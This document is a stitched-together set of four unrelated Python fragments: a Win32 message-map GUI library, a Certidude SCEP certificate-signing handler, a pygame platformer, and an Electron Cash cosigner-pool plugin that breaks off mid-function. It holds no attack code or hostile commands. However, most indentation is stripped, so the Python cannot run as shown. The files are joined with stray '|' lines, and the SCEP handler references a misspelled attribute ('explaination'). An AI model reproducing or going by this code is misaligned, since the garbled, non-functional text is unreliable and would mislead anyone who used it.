            print('%s, %d, %d, %d, %d' % (repr(self), hWnd, nMsg, wParam, lParam))
return self._msg_map_.Dispatch(self, hWnd, nMsg, wParam, lParam)
def IsDialogMessage(self, lpmsg):
return IsDialogMessage(self.handle, lpmsg)
def PreTranslateMessage(self, msg):
return 0
def TranslateAccelerator(self, msg):
return 0
def __repr__(self):
return '<Window hWnd: %d>' % self.handle
#this is the base class for all handlers defined in msg maps
class HANDLER(object):
    #the handler is given in the msg map as an unbound (static) method on some
    #class X; to let a derived class override a handler defined in a parent
    #class Y, a lambda trick is needed that looks the handler up by name on the
    #receiving instance at call time (making it 'virtual' again)
def __init__(self, handler):
#TODO how to determine if handler is a lambda or a named function without
#looking at '__name__'?:
if not handler:
self.m_handler = None
elif handler.__name__ == '<lambda>':
self.m_handler = handler
else:#trick to make handler 'virtual' again
self.m_handler = lambda self, event: getattr(self, handler.__name__)(event)
def __call__(self, receiver, event):
return self.handler(receiver, event)
#handler = property(lambda self: self.m_handler)
def getHandler(self):
return self.m_handler
def setHandler(self, value):
self.m_handler = value
handler = property(getHandler, setHandler)
#Handler for normal window messages (e.g. WM_SIZE, WM_CLOSE, WM_PAINT etc)
class MSG_HANDLER(HANDLER):
def __init__(self, msg, handler):
HANDLER.__init__(self, handler)
self.msg = msg
def __install__(self, msgMap):
msgMap._msg_map_[self.msg] = self
class NTF_MAP(dict):
def __call__(self, receiver, event):
nmhdr = NMHDR.from_address(int(event.lParam))
handler = self.get(str(nmhdr.code), None)
if handler:
event.nmhdr = nmhdr
return handler(receiver, event)
else:
event.handled = 0
return 0
#handler for notification messages
#handles all notifications with the given code
class NTF_HANDLER(HANDLER):
def __init__(self, code, handler):
HANDLER.__init__(self, handler)
self.code = code
def __install__(self, msgMap):
notifMap = msgMap._msg_map_.setdefault(WM_NOTIFY, NTF_MAP())
notifMap[str(self.code)] = self
#support for WM_COMMAND msgs
#cmd is a map from id -> [(code, handler), ...]
#first handler in the list that matches the code is fired
#if code == -1, then handler is fired for any code
class CMD_MAP(dict):
def __call__(self, receiver, event):
code = HIWORD(event.wParam)
id = LOWORD(event.wParam)
for handlerCode, handler in self.get(id, []):
if handlerCode == -1 or handlerCode == code:
event.id = id
event.code = code
return handler(receiver, event)
#not handled
event.handled = 0
return 0
#maps command message based on control id AND notification code
class CMD_HANDLER(HANDLER):
def __init__(self, id, code, handler):
HANDLER.__init__(self, handler)
self.id, self.code = id, code
def __install__(self, msgMap):
cmdMap = msgMap._msg_map_.setdefault(WM_COMMAND, CMD_MAP())
notifList = cmdMap.setdefault(self.id, [])
notifList.append((self.code, self))
#maps command message based on control id
class CMD_ID_HANDLER(HANDLER):
def __init__(self, id, handler):
HANDLER.__init__(self, handler)
self.id = id
def __install__(self, msgMap):
cmdMap = msgMap._msg_map_.setdefault(WM_COMMAND, CMD_MAP())
notifList = cmdMap.setdefault(self.id, [])
notifList.append((-1, self))
#deprecated, will be removed before 1.0
class CHAIN_MSG_MAP (object):
def __init__(self, msgMap): pass
def __install__(self, msgMap): pass
#decorator versions of the above
def msg_handler(msg):
def decorator_func(func):
func.handler = MSG_HANDLER(msg, func)
return func
return decorator_func
def cmd_handler(id, code = None):
def decorator_func(func):
if code:
func.handler = CMD_HANDLER(id, code, func)
else:
func.handler = CMD_ID_HANDLER(id, func)
return func
return decorator_func
def ntf_handler(code):
def decorator_func(func):
func.handler = NTF_HANDLER(code, func)
return func
return decorator_func
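# Illustrative sketch (assumption, not part of the original library): a Window
# subclass registers handlers with the decorators above, and WindowType installs
# them into the per-class _msg_map_:
#     class HelloWindow(Window):
#         _window_title_ = "hello"
#         @msg_handler(WM_DESTROY)      # WM_DESTROY assumed to be exported by
#         def on_destroy(self, event):  # 'from .windows import *'
#             PostQuitMessage(0)
#     # HelloWindow(); Run()  -- create the window and enter the message loop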
#TODO allow the addition of more specific filters
#TODO make filters weak so that remove filter is not needed
class MessageLoop:
def __init__(self):
self.m_filters = {}
def AddFilter(self, filterFunc):
self.m_filters[filterFunc] = 1
def RemoveFilter(self, filterFunc):
del self.m_filters[filterFunc]
def Run(self):
msg = MSG()
lpmsg = byref(msg)
while GetMessage(lpmsg, 0, 0, 0):
if not self.PreTranslateMessage(msg):
TranslateMessage(lpmsg)
DispatchMessage(lpmsg)
global quit
quit = True
def PreTranslateMessage(self, msg):
        for filterFunc in list(self.m_filters.keys()):
            if filterFunc(msg):
                return 1
        return 0
theMessageLoop = MessageLoop()
def GetMessageLoop():
return theMessageLoop
def Run():
theMessageLoop.Run()
class Application(object):
def Run(self):
return Run()
def Quit(self, nExitCode = 0):
"""quits the application by posting the WM_QUIT message with the given
exitCode"""
PostQuitMessage(nExitCode)
def Exit(self, nExitCode = 0):
self.Quit(nExitCode)
import click
import falcon
import hashlib
import logging
import os
from asn1crypto import cms, algos
from asn1crypto.core import SetOf, PrintableString
from base64 import b64decode
from certidude import config
from oscrypto import keys, asymmetric, symmetric
from oscrypto.errors import SignatureError
from .utils import AuthorityHandler
from .utils.firewall import whitelist_subnets
logger = logging.getLogger(__name__)
# Monkey patch asn1crypto
class SetOfPrintableString(SetOf):
_child_spec = PrintableString
cms.CMSAttributeType._map['2.16.840.1.113733.1.9.2'] = "message_type"
cms.CMSAttributeType._map['2.16.840.1.113733.1.9.3'] = "pki_status"
cms.CMSAttributeType._map['2.16.840.1.113733.1.9.4'] = "fail_info"
cms.CMSAttributeType._map['2.16.840.1.113733.1.9.5'] = "sender_nonce"
cms.CMSAttributeType._map['2.16.840.1.113733.1.9.6'] = "recipient_nonce"
cms.CMSAttributeType._map['2.16.840.1.113733.1.9.7'] = "trans_id"
cms.CMSAttribute._oid_specs['message_type'] = SetOfPrintableString
cms.CMSAttribute._oid_specs['pki_status'] = SetOfPrintableString
cms.CMSAttribute._oid_specs['fail_info'] = SetOfPrintableString
cms.CMSAttribute._oid_specs['sender_nonce'] = cms.SetOfOctetString
cms.CMSAttribute._oid_specs['recipient_nonce'] = cms.SetOfOctetString
cms.CMSAttribute._oid_specs['trans_id'] = SetOfPrintableString
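# Illustrative sketch (not from the original module): with the mappings above,
# SCEP-specific signed attributes of a parsed request can be read by name, e.g.:
#     info = cms.ContentInfo.load(der_bytes)   # der_bytes is hypothetical input
#     signer, = info['content']['signer_infos']
#     for attr in signer['signed_attrs']:
#         if attr['type'].native == 'trans_id':
#             transaction_id = attr['values'][0].native   # decoded as PrintableString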
class SCEPError(Exception):
    code = 25  # system failure
    explanation = "General system failure"
class SCEPBadAlgo(SCEPError):
    code = 0
    explanation = "Unsupported algorithm in SCEP request"
class SCEPBadMessageCheck(SCEPError):
    code = 1
    explanation = "Integrity check failed for SCEP request"
class SCEPBadRequest(SCEPError):
    code = 2
    explanation = "Bad request"
class SCEPBadTime(SCEPError):
    code = 3
    explanation = "Bad time"
class SCEPBadCertId(SCEPError):
    code = 4
    explanation = "Certificate authority mismatch"
class SCEPDigestMismatch(SCEPBadMessageCheck):
    explanation = "Digest mismatch"
class SCEPSignatureMismatch(SCEPBadMessageCheck):
    explanation = "Signature mismatch"
class SCEPResource(AuthorityHandler):
@whitelist_subnets(config.SCEP_SUBNETS)
def on_get(self, req, resp):
operation = req.get_param("operation", required=True)
if operation == "GetCACert":
resp.body = keys.parse_certificate(self.authority.certificate_buf).dump()
resp.append_header("Content-Type", "application/x-x509-ca-cert")
return
elif operation == "GetCACaps":
# TODO: return renewal flag based on renewal subnets config option
resp.body = "Renewal\nMD5\nSHA-1\nSHA-256\nSHA-512\nDES3\n"
return
elif operation == "PKIOperation":
pass
else:
raise falcon.HTTPBadRequest(
"Bad request",
"Unknown operation %s" % operation)
        # Pre-populate the reply attributes with a rejected status so a failure
        # response can be produced if an exception is raised below
encrypted_container = b""
attr_list = [
cms.CMSAttribute({
'type': "message_type",
'values': ["3"]
}),
cms.CMSAttribute({
'type': "pki_status",
'values': ["2"] # rejected
})
]
try:
info = cms.ContentInfo.load(b64decode(req.get_param("message", required=True)))
###############################################
### Verify signature of the outer container ###
###############################################
signed_envelope = info['content']
encap_content_info = signed_envelope['encap_content_info']
encap_content = encap_content_info['content']
# TODO: try except
current_certificate, = signed_envelope["certificates"]
signer, = signed_envelope["signer_infos"]
# TODO: compare cert to current one if we are renewing
digest_algorithm = signer["digest_algorithm"]["algorithm"].native
signature_algorithm = signer["signature_algorithm"]["algorithm"].native
if digest_algorithm not in ("md5", "sha1", "sha256", "sha512"):
raise SCEPBadAlgo()
if signature_algorithm != "rsassa_pkcs1v15":
raise SCEPBadAlgo()
message_digest = None
transaction_id = None
sender_nonce = None
for attr in signer["signed_attrs"]:
if attr["type"].native == "sender_nonce":
sender_nonce, = attr["values"]
elif attr["type"].native == "trans_id":
transaction_id, = attr["values"]
elif attr["type"].native == "message_digest":
message_digest, = attr["values"]
if getattr(hashlib, digest_algorithm)(encap_content.native).digest() != message_digest.native:
raise SCEPDigestMismatch()
if not sender_nonce:
raise SCEPBadRequest()
if not transaction_id:
raise SCEPBadRequest()
assert message_digest
            msg = signer["signed_attrs"].dump(force=True)
            assert msg[0] == 160  # 0xA0: the attributes are tagged [0] IMPLICIT inside SignerInfo
            # Verify the signature over the signed attributes. Per RFC 5652 the
            # signature covers the attributes encoded as an explicit SET OF, so
            # the leading [0] tag (0xA0) is replaced with the SET OF tag (0x31).
            try:
                asymmetric.rsa_pkcs1v15_verify(
                    asymmetric.load_certificate(current_certificate.dump()),
                    signer["signature"].native,
                    b"\x31" + msg[1:],
                    digest_algorithm)
except SignatureError:
raise SCEPSignatureMismatch()
###############################
### Decrypt inner container ###
###############################
info = cms.ContentInfo.load(encap_content.native)
encrypted_envelope = info['content']
encrypted_content_info = encrypted_envelope['encrypted_content_info']
iv = encrypted_content_info['content_encryption_algorithm']['parameters'].native
if encrypted_content_info['content_encryption_algorithm']["algorithm"].native != "des":
raise SCEPBadAlgo()
encrypted_content = encrypted_content_info['encrypted_content'].native
recipient, = encrypted_envelope['recipient_infos']
if recipient.native["rid"]["serial_number"] != self.authority.certificate.serial_number:
raise SCEPBadCertId()
key = asymmetric.rsa_pkcs1v15_decrypt(
self.authority.private_key,
recipient.native["encrypted_key"])
if len(key) == 8: key = key * 3 # Convert DES to 3DES
buf = symmetric.tripledes_cbc_pkcs5_decrypt(key, encrypted_content, iv)
_, _, common_name = self.authority.store_request(buf, overwrite=True)
logger.info("SCEP client from %s requested with %s digest algorithm, %s signature",
req.context["remote_addr"], digest_algorithm, signature_algorithm)
cert, buf = self.authority.sign(common_name, profile=config.PROFILES["gw"], overwrite=True)
signed_certificate = asymmetric.load_certificate(buf)
content = signed_certificate.asn1.dump()
except SCEPError as e:
attr_list.append(cms.CMSAttribute({
'type': "fail_info",
'values': ["%d" % e.code]
}))
logger.info("Failed to sign SCEP request due to: %s" % e.explaination)
else:
##################################
### Degenerate inner container ###
##################################
degenerate = cms.ContentInfo({
'content_type': "signed_data",
'content': cms.SignedData({
'version': "v1",
'certificates': [signed_certificate.asn1],
'digest_algorithms': [cms.DigestAlgorithm({
'algorithm': digest_algorithm
})],
'encap_content_info': {
'content_type': "data",
'content': cms.ContentInfo({
'content_type': "signed_data",
'content': None
}).dump()
},
'signer_infos': []
})
})
################################
### Encrypt middle container ###
################################
key = os.urandom(8)
iv, encrypted_content = symmetric.des_cbc_pkcs5_encrypt(key, degenerate.dump(), os.urandom(8))
assert degenerate.dump() == symmetric.tripledes_cbc_pkcs5_decrypt(key*3, encrypted_content, iv)
ri = cms.RecipientInfo({
'ktri': cms.KeyTransRecipientInfo({
'version': "v0",
'rid': cms.RecipientIdentifier({
'issuer_and_serial_number': cms.IssuerAndSerialNumber({
'issuer': current_certificate.chosen["tbs_certificate"]["issuer"],
'serial_number': current_certificate.chosen["tbs_certificate"]["serial_number"],
}),
}),
'key_encryption_algorithm': {
'algorithm': "rsa"
},
'encrypted_key': asymmetric.rsa_pkcs1v15_encrypt(
asymmetric.load_certificate(current_certificate.chosen.dump()), key)
})
})
encrypted_container = cms.ContentInfo({
'content_type': "enveloped_data",
'content': cms.EnvelopedData({
'version': "v1",
'recipient_infos': [ri],
'encrypted_content_info': {
'content_type': "data",
'content_encryption_algorithm': {
'algorithm': "des",
'parameters': iv
},
'encrypted_content': encrypted_content
}
})
}).dump()
attr_list = [
cms.CMSAttribute({
'type': "message_digest",
'values': [getattr(hashlib, digest_algorithm)(encrypted_container).digest()]
}),
cms.CMSAttribute({
'type': "message_type",
'values': ["3"]
}),
cms.CMSAttribute({
'type': "pki_status",
'values': ["0"] # ok
})
]
finally:
##############################
### Signed outer container ###
##############################
attrs = cms.CMSAttributes(attr_list + [
cms.CMSAttribute({
'type': "recipient_nonce",
'values': [sender_nonce]
}),
cms.CMSAttribute({
'type': "trans_id",
'values': [transaction_id]
})
])
signer = cms.SignerInfo({
"signed_attrs": attrs,
'version': "v1",
'sid': cms.SignerIdentifier({
'issuer_and_serial_number': cms.IssuerAndSerialNumber({
'issuer': self.authority.certificate.issuer,
'serial_number': self.authority.certificate.serial_number,
}),
}),
'digest_algorithm': algos.DigestAlgorithm({'algorithm': digest_algorithm}),
'signature_algorithm': algos.SignedDigestAlgorithm({'algorithm': "rsassa_pkcs1v15"}),
'signature': asymmetric.rsa_pkcs1v15_sign(
self.authority.private_key,
b"\x31" + attrs.dump()[1:],
digest_algorithm
)
})
resp.append_header("Content-Type", "application/x-pki-message")
resp.body = cms.ContentInfo({
'content_type': "signed_data",
'content': cms.SignedData({
'version': "v1",
'certificates': [self.authority.certificate],
'digest_algorithms': [cms.DigestAlgorithm({
'algorithm': digest_algorithm
})],
'encap_content_info': {
'content_type': "data",
'content': encrypted_container
},
'signer_infos': [signer]
})
}).dump()
|
|
import pygame
import time
# todo
# wrap round off edge of screen
# make screen scrolling smoother?
# add audio?
# new character
# simple character animation?
# tune movement to make it feel good
# add more platforms
# add more items and different types
# fall down to a crisis
# remove platforms that scroll off the bottom of the screen, so player freefalls after fall
pygame.init()
WIDTH = 800
HEIGHT = 1800
SCREEN_HEIGHT = 600
WHITE = (255, 255, 255)
crisis = 0
gameover=False
pygame.key.set_repeat(50,50)
screen = pygame.display.set_mode((WIDTH, SCREEN_HEIGHT))
background_image = pygame.image.load ("blue-sky.jpg")
gameover_image = pygame.image.load ("turtel 2.png")
jumper = pygame.sprite.Sprite()
jumper.image = pygame.image.load("turtle.png")
jumper.rect = jumper.image.get_rect()
jumper.rect.y = 1500
screen.fill(WHITE)
clock = pygame.time.Clock()
# as the player moves up this decreases and the screen scrolls upwards
camera_offset = 1200
#bottom of the screen
bottom = pygame.sprite.Sprite()
bottom.rect = pygame.Rect(-50,HEIGHT - 50, WIDTH+100, 50)
def create_platform(x, y):
width = 200
height = 30
platform = pygame.sprite.Sprite();
platform.rect = pygame.Rect(x, y, width, height)
return platform
def create_item(type, x, y):
item = pygame.sprite.Sprite()
item.image = pygame.image.load("coin.png")
item.rect = item.image.get_rect()
item.rect.x = x
item.rect.y = y
return item
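# convert a world-space rect into screen coordinates by subtracting the camera offset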
def to_camera_space(rect):
return pygame.Rect(rect.x, rect.y-camera_offset, rect.width, rect.height)
## items!!!
items = pygame.sprite.OrderedUpdates()
items.add(create_item("coin", 400,1450))
items.add(create_item("coin", 600,1050))
items.add(create_item("coin", 200,850))
items.add(create_item("coin", 300,700))
default_platforms = []
platform_colour = (200, 140, 80)
default_platforms.append(create_platform(200, 1200+500))
default_platforms.append(create_platform(400, 1200+300))
default_platforms.append(create_platform(500, 1000+100))
default_platforms.append(create_platform(200, 1200+100))
default_platforms.append(create_platform(600, 1000+100))
default_platforms.append(create_platform(200, 890))
default_platforms.append(create_platform(100, 700))
default_platforms.append(bottom)
platforms = default_platforms[::]
## when player presses jump button we set jump_frame to 0
## then each frame we apply the position diff stored in the
## jump_deltas to produce a parabolic jump
## then when we're finished we set jump_frame back to -1 ready to jump again
jump_frame = -1 # not jumping
jump_deltas = [ x**2 / 1.5 for x in range(10,0,-1)]
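## each delta is the upward movement (in pixels) for one frame of the jump;
## the values shrink quadratically (roughly 67px down to under 1px) so the jump decelerates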
## this tries to move the player, if we collide with a platform
## we don't allow the movement, if we collide with an item we
## collect it
score = 0
def apply_move(move_x,move_y):
global score
global camera_offset
jumper.rect.x += move_x
jumper.rect.y += move_y
jumper_group = pygame.sprite.GroupSingle(jumper)
if pygame.sprite.groupcollide(jumper_group, platforms, False, False):
jumper.rect.x -= move_x
jumper.rect.y -= move_y
if pygame.sprite.groupcollide(jumper_group, items, False, True):
print("Item collected!!" + str(score))
score +=1
#print("y={:d} camera_offset={:f}" .format(jumper.rect.y, camera_offset) )
    # if the player is in the top quarter of the screen, scroll the screen upwards
if jumper.rect.y < camera_offset + SCREEN_HEIGHT / 4 :
camera_offset = jumper.rect.y - SCREEN_HEIGHT / 3
# if player is falling off bottom of screen scroll screen downwards
if jumper.rect.y + jumper.rect.height > camera_offset + SCREEN_HEIGHT:
camera_offset = jumper.rect.y + jumper.rect.height - SCREEN_HEIGHT + 20
pygame.display.update()
gravity = 5
move = 15 # speed
game_running = True
while game_running:
clock.tick(30) # limit framerate to 30fps
apply_move(0, gravity)
for event in pygame.event.get():
if event.type == pygame.QUIT:
game_running = False
elif event.type == pygame.KEYDOWN and event.key == pygame.K_ESCAPE:
game_running = False
keys = pygame.key.get_pressed();
if keys[pygame.K_UP] or keys[pygame.K_SPACE] or keys[pygame.K_w]:
# if the player is just above or on a platform we allow a jump
# to test we form a rectangle just under the player and collide it against
# the platforms
feet = pygame.sprite.Sprite()
feet.rect = pygame.Rect(jumper.rect.x, jumper.rect.y+3+jumper.rect.height,
jumper.rect.width, 3)
if pygame.sprite.groupcollide([feet], platforms, False, False):
jump_frame = 0 # player is allowed to jump - start the jump sequence
if keys[pygame.K_LEFT] or keys[pygame.K_a]:
apply_move(-move, 0)
if keys[pygame.K_RIGHT] or keys[pygame.K_d]:
apply_move(move, 0)
if keys[pygame.K_y] and crisis:
crisis = 0
platforms = default_platforms[::]
jumper.rect.y = 1200
score = 0
if keys[pygame.K_n] and crisis:
gameover= True
for event in pygame.event.get():
if event.type == pygame.QUIT:
game_running = False
elif event.type == pygame.KEYDOWN and event.key == pygame.K_ESCAPE:
game_running = False
#print("{:f}".format(jumper.rect.x))
if jumper.rect.x < 0 :
jumper.rect.x = 800
elif jumper.rect.x > 800 :
jumper.rect.x = 0
    for platform in platforms[:]:  # iterate over a copy so removal is safe
        if platform.rect.y > camera_offset+SCREEN_HEIGHT:
            print("kill platform")
            platforms.remove(platform)
if pygame.sprite.spritecollide(jumper,[bottom],False):
crisis = 1
screen.fill(WHITE)
if jump_frame != -1:
apply_move(0, -jump_deltas[jump_frame])
jump_frame += 1
if len(jump_deltas) <= jump_frame:
jump_frame = -1
if gameover:
screen.blit(gameover_image,(0,0))
elif crisis:
font = pygame.font.Font(None, 36)
text_image = font.render("Give up your score to buy medicine for children in need", True,(153, 45, 189))
screen.blit(text_image,(100,400))
text_image = font.render("Yes", True,(153, 45, 189))
screen.blit(text_image,(200,500))
text_image = font.render("No", True,(153, 45, 189))
screen.blit(text_image,(300,500))
else:
screen.blit(background_image,(0,0))
screen.blit(jumper.image, to_camera_space(jumper.rect))
font = pygame.font.Font(None, 36)
text_image = font.render("score: "+str(score), True,(153, 45, 189))
text_rect = text_image.get_rect(centerx=100, centery=50)
screen.blit(text_image, text_rect)
for platform in platforms:
screen.fill(platform_colour, to_camera_space(platform.rect))
for item in items:
screen.blit(item.image, to_camera_space(item.rect))
pygame.display.update()
pygame.quit()
|
|
#!/usr/bin/env python3
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2014 Thomas Voegtlin
#
# Electron Cash - lightweight Bitcoin Cash client
# Copyright (C) 2019 The Electron Cash Developers
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys, traceback, queue
from xmlrpc.client import ServerProxy, Transport
import http.client
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
from electroncash import bitcoin, util, keystore
from electroncash import transaction
from electroncash.plugins import BasePlugin, hook
from electroncash.i18n import _
from electroncash.wallet import Multisig_Wallet
from electroncash.util import bh2u, bfh, Weak, InvalidPassword, print_error
from electroncash_gui.qt.transaction_dialog import show_transaction, TxDialog
# Workarounds to the fact that xmlrpc.client doesn't take a timeout= arg.
class TimeoutTransport(Transport):
def __init__(self, timeout=2.0, *l, **kw):
super().__init__(*l, **kw)
self.timeout = timeout
def make_connection(self, host):
return http.client.HTTPConnection(host, timeout=self.timeout)
class TimeoutServerProxy(ServerProxy):
def __init__(self, uri, timeout=2.0, *l, **kw):
kw['transport'] = TimeoutTransport(timeout=timeout, use_datetime=kw.get('use_datetime', False))
super().__init__(uri, *l, **kw)
# /end timeout= Workarounds
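# Typical use (see State.__init__ below): TimeoutServerProxy('http://host:port',
# allow_none=True, timeout=2.0) behaves like ServerProxy but every HTTP request
# gives up after ~2 seconds instead of hanging.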
PORT = 8081
HOST = 'sync.imaginary.cash'
class Listener(util.DaemonThread):
def __init__(self, state):
super().__init__()
self.daemon = True
self.state_ref = Weak.ref(state)
self.received = set()
self.keyhashes = []
self.timeoutQ = queue.Queue() # this queue's sole purpose is to provide an interruptible sleep
def diagnostic_name(self):
wname = str(self.state_ref() and self.state_ref().window_ref() and self.state_ref().window_ref().diagnostic_name())
return super().diagnostic_name() + "@" + wname
def set_keyhashes(self, keyhashes):
self.keyhashes = keyhashes
def clear(self, keyhash):
state = self.state_ref()
if state: state.server.delete(keyhash)
try: self.received.remove(keyhash)
except (ValueError, KeyError): pass
def run(self):
self.print_error("started.")
while self.running:
try:
if not self.keyhashes:
self.timeoutQ.get(timeout=2.0) # this shouldn't ever happen but.. poll until ready.
continue
for keyhash in self.keyhashes:
if keyhash in self.received:
# already seen.. avoids popup window spam
continue
try:
message = self.state_ref() and self.state_ref().server.get(keyhash)
except Exception as e:
self.print_error("cannot contact cosigner pool", repr(e))
break
if message:
self.received.add(keyhash)
self.print_error("received message for", keyhash)
self.state_ref() and self.state_ref().cosigner_receive_signal.emit(keyhash, message)
# poll every 10 seconds
self.timeoutQ.get(timeout=10.0)
except queue.Empty:
# timed out, continue
continue
self.print_error("exiting.")
def stop(self):
# extends DaemonThread by also writing to the timeoutQ to wake up the sleeping thread, if any
super().stop()
self.timeoutQ.put(None) # wake up sleeper, if any
def start(self):
# overrides DaemonThread -- clears queue on (re)start
if not self.is_running():
self.timeoutQ = queue.Queue() # clear queue in case it had stale data.
super().start()
def stop_join(self):
self.stop()
try: self.join()
except RuntimeError: pass # was never started
class State(QObject):
''' Window-specific state. Gets inserted into cosigner_pool_state attribute
for window. '''
cosigner_receive_signal = pyqtSignal(object, object)
listener = None
keys = []
cosigner_list = []
plugin_ref = None # Weak.ref to plugin object
window_ref = None # Weak.ref to window object
server = None
def __init__(self, plugin, window):
super().__init__() # top-level QObject, no parent()
self.server = TimeoutServerProxy('http://%s:%d'%(HOST,PORT), allow_none=True, timeout = 2.0)
self.listener = Listener(self)
self.plugin_ref = Weak.ref(plugin)
self.window_ref = Weak.ref(window)
self.cosigner_receive_signal.connect(self.on_receive)
def on_receive(self, k, m):
plugin = self.plugin_ref()
window = self.window_ref()
if plugin and window:
plugin.on_receive(window, k, m)
class _Dead:
pass
class Plugin(BasePlugin):
Instance_ref = Weak.ref(_Dead()) # Make sure Instance_ref is always defined, defaults to dead object
def __init__(self, parent, config, name):
BasePlugin.__init__(self, parent, config, name)
self.windows = []
self.initted = False
@hook
def init_qt(self, gui):
if self.initted: return # already initted
self.print_error("Initializing...")
for window in gui.windows:
self.on_new_window(window)
Plugin.Instance_ref = Weak.ref(self)
self.initted = True
@hook
def on_new_window(self, window):
try: wallet = window.wallet
except AttributeError:
# this can happen if wallet is not started up properly
self.print_error("WARNING: Window {} lacks a wallet -- startup race condition likely. FIXME!".format(window.diagnostic_name()))
return
if isinstance(wallet, Multisig_Wallet):
window.cosigner_pool_state = state = State(self, window)
self.windows.append(window)
self.update(window)
# un-gray-out buttons for tx dialogs left around related to this window
for b in Plugin.get_all_cosigner_buttons():
if b.wallet_ref() == wallet:
b.setEnabled(True)
@hook
def on_close_window(self, window):
if window in self.windows:
state = getattr(window, 'cosigner_pool_state', None)
if state:
if state.listener:
self.print_error("shutting down listener for",window.diagnostic_name())
state.listener.stop_join()
state.deleteLater()
delattr(window, 'cosigner_pool_state')
self.print_error("unregistered for window",window.diagnostic_name())
self.windows.remove(window)
# gray out buttons for tx dialogs left around related to this window
for b in Plugin.get_all_cosigner_buttons():
if b.wallet_ref() == window.wallet:
b.setEnabled(False)
@staticmethod
def get_all_cosigner_buttons():
ret = []
app = QApplication.instance()
for w in app.topLevelWidgets():
if isinstance(w, TxDialog):
but = getattr(w, 'cosigner_send_button', None)
if but: ret.append(but)
return ret
def is_available(self):
return True
def on_close(self):
for w in self.windows.copy():
self.on_close_window(w)
self.windows = []
self.initted = False
super().on_close()
def update(self, window):
wallet = window.wallet
state = window.cosigner_pool_state
if not state:
self.print_error("No cosigner pool state object for window", window.diagnostic_name())
return
listener = state.listener
state.keys = []
state.cosigner_list = []
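        # Keystores we can sign with become our "receive" keys (watched by the
        # listener); watching-only keystores are cosigners we can send to.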
for key, keystore in wallet.keystores.items():
xpub = keystore.get_master_public_key()
K = bitcoin.deserialize_xpub(xpub)[-1]
_hash = bh2u(bitcoin.Hash(K))
if not keystore.is_watching_only():
state.keys.append((key, _hash))
else:
state.cosigner_list.append((xpub, K, _hash))
listener.set_keyhashes([t[1] for t in state.keys])
if not listener.is_running():
self.print_error("Starting listener for", window.diagnostic_name())
listener.start()
@hook
def transaction_dialog(self, d):
window, state = self._find_window_and_state_for_wallet(d.wallet)
if window and state:
d.cosigner_send_button = b = QPushButton(_("Send to cosigner"))
b.wallet_ref = Weak.ref(window.wallet)
b.clicked.connect(lambda: Plugin.do_send_static(d))
d.buttons.insert(0, b)
self.transaction_dialog_update(d)
@hook
def transaction_dialog_update(self, d):
window, state = self._find_window_and_state_for_wallet(d.wallet)
but = getattr(d, 'cosigner_send_button', None)
if not but or not window or not state or d.tx.is_complete() or d.wallet.can_sign(d.tx):
but and but.hide()
return
for xpub, K, _hash in state.cosigner_list:
if self.cosigner_can_sign(d.tx, xpub):
but and but.show()
break
else:
but and but.hide()
def _find_window_and_state_for_wallet(self, wallet):
for window in self.windows:
if window.wallet == wallet:
return window, window.cosigner_pool_state
return None, None
def cosigner_can_sign(self, tx, cosigner_xpub):
from electroncash.keystore import is_xpubkey, parse_xpubkey
xpub_set = set([])
for txin in tx.inputs():
for x_pubkey in txin['x_pubkeys']:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
xpub_set.add(xpub)
return cosigner_xpub in xpub_set
@staticmethod
def do_send_static(d):
''' Decouples button slot from running instance in case user stops/restarts the plugin while TxDialogs are up. '''
plugin = Plugin.Instance_ref()
if plugin:
plugin.do_send(d)
else:
print_error("[cosigner_pool] No plugin.")
def do_send(self, d):
tx = d.tx
window, state = self._find_window_and_state_for_wallet(d.wallet)
if not tx or not window or not state:
self.print_error("Missing tx or window or state")
return
for xpub, K, _hash in state.cosigner_list:
if not self.cosigner_can_sign(tx, xpub):
continue
message = bitcoin.encrypt_message(bfh(tx.raw), bh2u(K)).decode('ascii')
try:
state.server.put(_hash, message)
except Exception as e:
traceback.print_exc(file=sys.stdout)
window.show_error(_("Failed to send transaction to cosigning pool."))
return
d.show_message(_("Your transaction was sent to the cosigning pool.") + '\n' +
_("Open your cosigner wallet to retrieve it."))
def on_receive(self, window, keyhash, message):
self.print_error("signal arrived for", keyhash, "@", window.diagnostic_name())
state = getattr(window, 'cosigner_pool_state', None)
if not state:
self.print_error("Error: state object not found")
return
keys = state.keys
for key, _hash in keys:
if _hash == keyhash:
break
else:
self.print_error("keyhash not found")
return
wallet = window.wallet
if isinstance(wallet.keystore, keystore.Hardware_KeyStore):
window.show_warning(_('An encrypted transaction was retrieved from cosigning pool.') + '\n' +
_('However, hardware wallets do not support message decryption, '
'which makes them not compatible with the current design of cosigner pool.'))
return
password = None
if wallet.has_password():
password = window.password_dialog(_('An encrypted transaction was retrieved from cosigning pool.') + '\n' +
_('Please enter your password to decrypt it.'))
if not password:
return
else:
details = (_("If you choose 'Yes', it will be decrypted and a transaction window will be shown, giving you the opportunity to sign the transaction.")
+ "\n\n" + _("If you choose 'No', you will be asked again later (the next time this wallet window is opened)."))
ret = window.msg_box(icon = QMessageBox.Question, parent = None, title=_("Cosigner Pool"), buttons=QMessageBox.Yes|QMessageBox.No,
text = _("An encrypted transaction was retrieved from cosigning pool.") + '\n' + _("Do you want to open it now?"),
detail_text = details)
if ret != QMessageBox.Yes:
return
err, badpass = "Unknown Error", False
try:
xprv = wallet.keystore.get_master_private_key(password)
except InvalidPassword as e:
err, badpass = str(e), True
xprv = None
if not xprv:
window.show_error(err)
if badpass:
